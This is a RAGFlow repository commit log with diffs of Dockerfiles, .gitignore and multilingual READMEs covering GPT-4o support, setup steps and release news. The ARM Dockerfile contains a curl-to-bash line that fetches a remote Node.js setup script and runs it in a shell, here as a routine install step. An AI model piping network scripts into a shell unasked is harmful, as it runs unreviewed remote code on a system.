- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-15 12:08:32 +08:00
234afb25d8 feat: support GPT-4o #771 and hide the add button when the folder is a knowledge base (#775)
### What problem does this PR solve?

feat: support GPT-4o  #771 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-15 11:34:57 +08:00
aa1c915d6e support gpt-4o (#773)
### What problem does this PR solve?
#771 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-15 11:16:08 +08:00
77b1520b66 Refactor message output format (#772)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Refactoring

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-15 10:48:42 +08:00
6b06ccead4 Miscellaneous updates (#769)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-14 18:46:39 +08:00
282f0857a3 fix: hide the add button when the folder is a knowledge base (#765)
### What problem does this PR solve?

#764 fix: hide the add button when the folder is a knowledge base

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-14 16:53:32 +08:00
d7744f5870 Refactor method name (#760)
### What problem does this PR solve?

#757

### Type of change

- [x] Refactoring

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-14 14:48:15 +08:00
9b21b66f23 Create quickstart.md (#743)
### What problem does this PR solve?

Draft quickstart. 

### Type of change

- [x] Documentation Update
2024-05-14 12:22:33 +08:00
aa03dfa453 fix bug of get file (#746)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-13 14:02:38 +08:00
69b7c61498 fix: typo in user_app.py (#740)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Bug Fix (non-breaking change 
- [x] Other (please describe): Fix typo
2024-05-13 09:25:45 +08:00
8769619bb1 Update readme (#741)
### What problem does this PR solve?

Update readme.

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-12 13:40:47 +08:00
ffe5737f7d let index be batchly. (#733)
### What problem does this PR solve?

let index be batchly.

### Type of change


- [x] Refactoring
2024-05-11 19:47:53 +08:00
04a9e95161 let file in knowledgebases visible in file manager (#714)
### What problem does this PR solve?

Let file in knowledgebases visible in file manager.
#162 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-11 16:04:28 +08:00
91b4a18c47 Make the app name configurable even after the project is built (#731)
### What problem does this PR solve?

Make the app name configurable even after the project is built #730 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-11 16:03:07 +08:00
33eaf6fa2e docs: update README_ja.md (#707)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-10 11:22:40 +08:00
d65ba3e4d7 feat: delete the added model #503 and display an error message when the requested file fails to parse #684 (#708)
### What problem does this PR solve?

feat: delete the added model #503
feat: display an error message when the requested file fails to parse
#684

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-10 10:38:39 +08:00
bef1bbdf3e Update README with Detailed WebUI Service Launch Instructions (#694)
### What problem does this PR solve?

Improve README by detailing Launch Service from Source section

This commit enhances the README document by adding comprehensive steps
for running the WebUI service in the 'Launch Service from Source'
section. It aims to provide clearer guidance for users attempting to
start the service from the source code, making the setup process more
accessible and understandable.

Key changes include:
- Detailed instructions for setting up and running the WebUI service.
- Necessary prerequisites for launching the service from source.

This update ensures that users have all the information they need to
successfully launch the service, improving the overall usability of our
project.

### Type of change

- [x] Documentation Update
2024-05-10 09:48:50 +08:00
6b36f31f92 Minor editorial updates (#700)
### What problem does this PR solve?

Editorial updates only. 

### Type of change

- [x] Documentation Update
2024-05-10 09:48:24 +08:00
648a2baaa9 fix disabled doc is still retreivalable (#695)
### What problem does this PR solve?

Fix that disabled doc is still retreivalable

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-09 15:32:24 +08:00
9392b8bc8f 0509 faq (#693)
### What problem does this PR solve?

Editorial updates only. 

### Type of change

- [x] Documentation Update
2024-05-09 12:37:45 +08:00
4153a36683 truncate text to fitin embedding model (#692)
### What problem does this PR solve?


### Type of change

- [x] Refactoring
2024-05-09 11:35:08 +08:00
GYH
bca63ad571 Update faq.md (#685)
### What problem does this PR solve?

Updated FAQ: How to upgrade RAGFlow

### Type of change

- [x] Documentation Update
2024-05-09 11:32:36 +08:00
793e29f23a fix: fix uploaded file time error #680 (#690)
### What problem does this PR solve?

fix: fix uploaded file time error #680
feat: support preview of word and excel #684 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-09 11:30:15 +08:00
99be226c7c fix coordinate error (#686)
### What problem does this PR solve?

#683 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-08 20:00:14 +08:00
7ddb2f19be make sure to raise exception if redis is not there (#674)
### What problem does this PR solve?

### Type of change

- [x] Refactoring
2024-05-08 15:20:45 +08:00
c28f7b5d38 make sure the error will be recorded. (#672)
### What problem does this PR solve?


### Type of change

- [x] Refactoring
2024-05-08 13:58:41 +08:00
521 changed files with 72946 additions and 10988 deletions

7
.gitignore vendored
View File

@ -29,3 +29,10 @@ Cargo.lock
docker/ragflow-logs/
/flask_session
/logs
rag/res/deepdoc
# Exclude sdk generated files
sdk/python/ragflow.egg-info/
sdk/python/build/
sdk/python/dist/
sdk/python/ragflow_sdk.egg-info/

View File

@ -1,4 +1,4 @@
FROM swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow-base:v1.0
FROM infiniflow/ragflow-base:v2.0
USER root
WORKDIR /ragflow
@ -10,11 +10,14 @@ ADD ./api ./api
ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./agent ./agent
ADD ./graphrag ./graphrag
ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com
ADD docker/entrypoint.sh ./entrypoint.sh
ADD docker/.env ./
RUN chmod +x ./entrypoint.sh
ENTRYPOINT ["./entrypoint.sh"]

34
Dockerfile.arm Normal file
View File

@ -0,0 +1,34 @@
FROM python:3.11
USER root
WORKDIR /ragflow
COPY requirements_arm.txt /ragflow/requirements.txt
RUN pip install -i https://mirrors.aliyun.com/pypi/simple/ --default-timeout=1000 -r requirements.txt &&\
python -c "import nltk;nltk.download('punkt');nltk.download('wordnet')"
RUN apt-get update && \
apt-get install -y curl gnupg && \
rm -rf /var/lib/apt/lists/*
RUN curl -sL https://deb.nodesource.com/setup_20.x | bash - && \
apt-get install -y --fix-missing nodejs nginx ffmpeg libsm6 libxext6 libgl1
ADD ./web ./web
RUN cd ./web && npm i --force && npm run build
ADD ./api ./api
ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./agent ./agent
ADD ./graphrag ./graphrag
ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com
ADD docker/entrypoint.sh ./entrypoint.sh
ADD docker/.env ./
RUN chmod +x ./entrypoint.sh
ENTRYPOINT ["./entrypoint.sh"]

View File

@ -1,11 +1,11 @@
FROM swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow-base:v1.0
FROM infiniflow/ragflow-base:v2.0
USER root
WORKDIR /ragflow
## for cuda > 12.0
RUN /root/miniconda3/envs/py11/bin/pip uninstall -y onnxruntime-gpu
RUN /root/miniconda3/envs/py11/bin/pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
RUN pip uninstall -y onnxruntime-gpu
RUN pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
ADD ./web ./web
@ -15,6 +15,8 @@ ADD ./api ./api
ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./agent ./agent
ADD ./graphrag ./graphrag
ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com

View File

@ -30,6 +30,8 @@ ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./requirements.txt ./requirements.txt
ADD ./agent ./agent
ADD ./graphrag ./graphrag
RUN apt install openmpi-bin openmpi-common libopenmpi-dev
ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH

View File

@ -30,6 +30,8 @@ ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./requirements.txt ./requirements.txt
ADD ./agent ./agent
ADD ./graphrag ./graphrag
RUN dnf install -y openmpi openmpi-devel python3-openmpi
ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH

225
README.md
View File

@ -17,16 +17,70 @@
<a href="https://demo.ragflow.io" target="_blank">
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.5.0-brightgreen"
alt="docker pull infiniflow/ragflow:v0.5.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=1570EF" alt="license">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.9.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.9.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
</a>
</p>
<h4 align="center">
<a href="https://ragflow.io/docs/dev/">Document</a> |
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
<a href="https://twitter.com/infiniflowai">Twitter</a> |
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
<a href="https://demo.ragflow.io">Demo</a>
</h4>
<details open>
<summary></b>📕 Table of Contents</b></summary>
- 💡 [What is RAGFlow?](#-what-is-ragflow)
- 🎮 [Demo](#-demo)
- 📌 [Latest Updates](#-latest-updates)
- 🌟 [Key Features](#-key-features)
- 🔎 [System Architecture](#-system-architecture)
- 🎬 [Get Started](#-get-started)
- 🔧 [Configurations](#-configurations)
- 🛠️ [Build from source](#-build-from-source)
- 🛠️ [Launch service from source](#-launch-service-from-source)
- 📚 [Documentation](#-documentation)
- 📜 [Roadmap](#-roadmap)
- 🏄 [Community](#-community)
- 🙌 [Contributing](#-contributing)
</details>
## 💡 What is RAGFlow?
[RAGFlow](https://demo.ragflow.io) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
## 🎮 Demo
Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
</div>
## 🔥 Latest Updates
- 2024-08-02 Supports GraphRAG inspired by [graphrag](https://github.com/microsoft/graphrag) , and mind map.
- 2024-07-23 Supports audio file parsing.
- 2024-07-21 Supports more LLMs (LocalAI, OpenRouter, StepFun, and Nvidia).
- 2024-07-18 Adds more components (Wikipedia, PubMed, Baidu, and Duckduckgo) to the graph.
- 2024-07-08 Supports workflow based on [Graph](./graph/README.md).
- 2024-06-27 Supports Markdown and Docx in the Q&A parsing method.
- 2024-06-27 Supports extracting images from Docx files.
- 2024-06-27 Supports extracting tables from Markdown files.
- 2024-06-06 Supports [Self-RAG](https://huggingface.co/papers/2310.11511), which is enabled by default in dialog settings.
- 2024-05-30 Integrates [BCE](https://github.com/netease-youdao/BCEmbedding) and [BGE](https://github.com/FlagOpen/FlagEmbedding) reranker models.
- 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
- 2024-05-15 Integrates OpenAI GPT-4o.
## 🌟 Key Features
@ -56,17 +110,6 @@
- Multiple recall paired with fused re-ranking.
- Intuitive APIs for seamless integration with business.
## 📌 Latest Features
- 2024-05-08 Integrates LLM DeepSeek.
- 2024-04-26 Adds file management.
- 2024-04-19 Supports conversation API ([detail](./docs/conversation_api.md)).
- 2024-04-16 Integrates an embedding model 'bce-embedding-base_v1' from [BCEmbedding](https://github.com/netease-youdao/BCEmbedding), and [FastEmbed](https://github.com/qdrant/fastembed), which is designed specifically for light and speedy embedding.
- 2024-04-11 Supports [Xinference](./docs/xinference.md) for local LLM deployment.
- 2024-04-10 Adds a new layout recognition model for analyzing Laws documentation.
- 2024-04-08 Supports [Ollama](./docs/ollama.md) for local LLM deployment.
- 2024-04-07 Supports Chinese UI.
## 🔎 System Architecture
<div align="center" style="margin-top:20px;margin-bottom:20px;">
@ -85,7 +128,7 @@
### 🚀 Start up the server
1. Ensure `vm.max_map_count` >= 262144 ([more](./docs/max_map_count.md)):
1. Ensure `vm.max_map_count` >= 262144:
> To check the value of `vm.max_map_count`:
>
@ -114,12 +157,14 @@
3. Build the pre-built Docker images and start up the server:
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.8.0`, before running the following commands.
```bash
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
```
> Please note that running the above commands will automatically download the development version docker image of RAGFlow. If you want to download and run a specific version of docker image, please find the RAGFLOW_VERSION variable in the docker/.env file, change it to the corresponding version, for example, RAGFLOW_VERSION=v0.5.0, and run the above commands.
> The core image is about 9 GB in size and may take a while to load.
@ -147,10 +192,10 @@
> If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anomaly` error because, at that moment, your RAGFlow may not be fully initialized.
5. In your web browser, enter the IP address of your server and log in to RAGFlow.
> With default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
> See [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) for more information.
> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
_The show is now on!_
@ -187,69 +232,106 @@ $ chmod +x ./entrypoint.sh
$ docker compose up -d
```
## 🛠️ Launch Service from Source
## 🛠️ Launch service from source
To launch the service from source, please follow these steps:
To launch the service from source:
1. Clone the repository
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
```
1. Clone the repository:
2. Create a virtual environment (ensure Anaconda or Miniconda is installed)
```bash
$ conda create -n ragflow python=3.11.0
$ conda activate ragflow
$ pip install -r requirements.txt
```
If CUDA version is greater than 12.0, execute the following additional commands:
```bash
$ pip uninstall -y onnxruntime-gpu
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
```
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
```
3. Copy the entry script and configure environment variables
```bash
$ cp docker/entrypoint.sh .
$ vi entrypoint.sh
```
Use the following commands to obtain the Python path and the ragflow project path:
```bash
$ which python
$ pwd
```
2. Create a virtual environment, ensuring that Anaconda or Miniconda is installed:
Set the output of `which python` as the value for `PY` and the output of `pwd` as the value for `PYTHONPATH`.
```bash
$ conda create -n ragflow python=3.11.0
$ conda activate ragflow
$ pip install -r requirements.txt
```
```bash
# If your CUDA version is higher than 12.0, run the following additional commands:
$ pip uninstall -y onnxruntime-gpu
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
```
If `LD_LIBRARY_PATH` is already configured, it can be commented out.
3. Copy the entry script and configure environment variables:
```bash
# Adjust configurations according to your actual situation; the two export commands are newly added.
PY=${PY}
export PYTHONPATH=${PYTHONPATH}
# Optional: Add Hugging Face mirror
export HF_ENDPOINT=https://hf-mirror.com
```
```bash
# Get the Python path:
$ which python
# Get the ragflow project path:
$ pwd
```
```bash
$ cp docker/entrypoint.sh .
$ vi entrypoint.sh
```
4. Start the base services
```bash
$ cd docker
$ docker compose -f docker-compose-base.yml up -d
```
```bash
# Adjust configurations according to your actual situation (the following two export commands are newly added):
# - Assign the result of `which python` to `PY`.
# - Assign the result of `pwd` to `PYTHONPATH`.
# - Comment out `LD_LIBRARY_PATH`, if it is configured.
# - Optional: Add Hugging Face mirror.
PY=${PY}
export PYTHONPATH=${PYTHONPATH}
export HF_ENDPOINT=https://hf-mirror.com
```
5. Check the configuration files
Ensure that the settings in **docker/.env** match those in **conf/service_conf.yaml**. The IP addresses and ports for related services in **service_conf.yaml** should be changed to the local machine IP and ports exposed by the container.
4. Launch the third-party services (MinIO, Elasticsearch, Redis, and MySQL):
6. Launch the service
```bash
$ chmod +x ./entrypoint.sh
$ bash ./entrypoint.sh
```
```bash
$ cd docker
$ docker compose -f docker-compose-base.yml up -d
```
5. Check the configuration files, ensuring that:
- The settings in **docker/.env** match those in **conf/service_conf.yaml**.
- The IP addresses and ports for related services in **service_conf.yaml** match the local machine IP and ports exposed by the container.
6. Launch the RAGFlow backend service:
```bash
$ chmod +x ./entrypoint.sh
$ bash ./entrypoint.sh
```
7. Launch the frontend service:
```bash
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ vim .umirc.ts
# Update proxy.target to http://127.0.0.1:9380
$ npm run dev
```
8. Deploy the frontend service:
```bash
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ umi build
$ mkdir -p /ragflow/web
$ cp -r dist /ragflow/web
$ apt install nginx -y
$ cp ../docker/nginx/proxy.conf /etc/nginx
$ cp ../docker/nginx/nginx.conf /etc/nginx
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
$ systemctl start nginx
```
## 📚 Documentation
- [FAQ](./docs/faq.md)
- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)
## 📜 Roadmap
@ -259,7 +341,8 @@ See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)
- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
## 🙌 Contributing
RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) first.
RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](./docs/references/CONTRIBUTING.md) first.

View File

@ -17,16 +17,48 @@
<a href="https://demo.ragflow.io" target="_blank">
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.5.0-brightgreen"
alt="docker pull infiniflow/ragflow:v0.5.0"></a>
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.9.0-brightgreen"
alt="docker pull infiniflow/ragflow:v0.9.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=1570EF" alt="license">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
</a>
</p>
<h4 align="center">
<a href="https://ragflow.io/docs/dev/">Document</a> |
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
<a href="https://twitter.com/infiniflowai">Twitter</a> |
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
<a href="https://demo.ragflow.io">Demo</a>
</h4>
## 💡 RAGFlow とは?
[RAGFlow](https://demo.ragflow.io) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM大規模言語モデルを組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
[RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM大規模言語モデルを組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
## 🎮 Demo
デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
</div>
## 🔥 最新情報
- 2024-08-02 [graphrag](https://github.com/microsoft/graphrag) からインスピレーションを得た GraphRAG とマインド マップをサポートします。
- 2024-07-23 音声ファイルの解析をサポートしました。
- 2024-07-21 より多くの LLM サプライヤー (LocalAI/OpenRouter/StepFun/Nvidia) をサポートします。
- 2024-07-18 グラフにコンポーネント(Wikipedia/PubMed/Baidu/Duckduckgo)を追加しました。
- 2024-07-08 [Graph](./graph/README.md) ベースのワークフローをサポート
- 2024-06-27 Q&A解析方式はMarkdownファイルとDocxファイルをサポートしています。
- 2024-06-27 Docxファイルからの画像の抽出をサポートします。
- 2024-06-27 Markdownファイルからテーブルを抽出することをサポートします。
- 2024-06-06 会話設定でデフォルトでチェックされている [Self-RAG](https://huggingface.co/papers/2310.11511) をサポートします。
- 2024-05-30 [BCE](https://github.com/netease-youdao/BCEmbedding) 、[BGE](https://github.com/FlagOpen/FlagEmbedding) reranker を統合。
- 2024-05-23 より良いテキスト検索のために [RAPTOR](https://arxiv.org/html/2401.18059v1) をサポート。
- 2024-05-15 OpenAI GPT-4oを統合しました。
## 🌟 主な特徴
@ -56,18 +88,6 @@
- 複数の想起と融合された再ランク付け。
- 直感的な API によってビジネスとの統合がシームレスに。
## 📌 最新の機能
- 2024-05-08
- 2024-04-26 「ファイル管理」機能を追加しました。
- 2024-04-19 会話 API をサポートします ([詳細](./docs/conversation_api.md))。
- 2024-04-16 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) から埋め込みモデル「bce-embedding-base_v1」を追加します。
- 2024-04-16 [FastEmbed](https://github.com/qdrant/fastembed) は、軽量かつ高速な埋め込み用に設計されています。
- 2024-04-11 ローカル LLM デプロイメント用に [Xinference](./docs/xinference.md) をサポートします。
- 2024-04-10 メソッド「Laws」に新しいレイアウト認識モデルを追加します。
- 2024-04-08 [Ollama](./docs/ollama.md) を使用した大規模モデルのローカライズされたデプロイメントをサポートします。
- 2024-04-07 中国語インターフェースをサポートします。
## 🔎 システム構成
<div align="center" style="margin-top:20px;margin-bottom:20px;">
@ -86,7 +106,7 @@
### 🚀 サーバーを起動
1. `vm.max_map_count` >= 262144 であることを確認する【[もっと](./docs/max_map_count.md)】:
1. `vm.max_map_count` >= 262144 であることを確認する:
> `vm.max_map_count` の値をチェックするには:
>
@ -121,7 +141,7 @@
$ docker compose up -d
```
> 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.5.0として、上記のコマンドを実行してください。
> 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.9.0として、上記のコマンドを実行してください。
> コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。
@ -152,7 +172,7 @@
> デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
> 詳しくは [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) を参照してください。
> 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。
_これで初期設定完了ショーの開幕です_
@ -183,7 +203,7 @@
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
$ docker build -t infiniflow/ragflow:v0.5.0 .
$ docker build -t infiniflow/ragflow:v0.8.0 .
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
@ -251,7 +271,10 @@ $ bash ./entrypoint.sh
## 📚 ドキュメンテーション
- [FAQ](./docs/faq.md)
- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)
## 📜 ロードマップ
@ -261,7 +284,8 @@ $ bash ./entrypoint.sh
- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
## 🙌 コントリビュート
RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず[コントリビューションガイド](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md)をご覧ください。
RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず[コントリビューションガイド](./docs/references/CONTRIBUTING.md)をご覧ください。

View File

@ -17,16 +17,47 @@
<a href="https://demo.ragflow.io" target="_blank">
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.5.0-brightgreen"
alt="docker pull infiniflow/ragflow:v0.5.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=1570EF" alt="license">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.9.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.9.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
</a>
</p>
<h4 align="center">
<a href="https://ragflow.io/docs/dev/">Document</a> |
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
<a href="https://twitter.com/infiniflowai">Twitter</a> |
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
<a href="https://demo.ragflow.io">Demo</a>
</h4>
## 💡 RAGFlow 是什么?
[RAGFlow](https://demo.ragflow.io) 是一款基于深度文档理解构建的开源 RAGRetrieval-Augmented Generation引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程结合大语言模型LLM针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
[RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAGRetrieval-Augmented Generation引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程结合大语言模型LLM针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
## 🎮 Demo 试用
请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
</div>
## 🔥 近期更新
- 2024-08-02 支持 GraphRAG 启发于 [graphrag](https://github.com/microsoft/graphrag) 和思维导图。
- 2024-07-23 支持解析音频文件。
- 2024-07-21 支持更多的大模型供应商(LocalAI/OpenRouter/StepFun/Nvidia)。
- 2024-07-18 在Graph中支持算子Wikipedia、PubMed、Baidu和Duckduckgo。
- 2024-07-08 支持 Agentic RAG: 基于 [Graph](./graph/README.md) 的工作流。
- 2024-06-27 Q&A 解析方式支持 Markdown 文件和 Docx 文件。
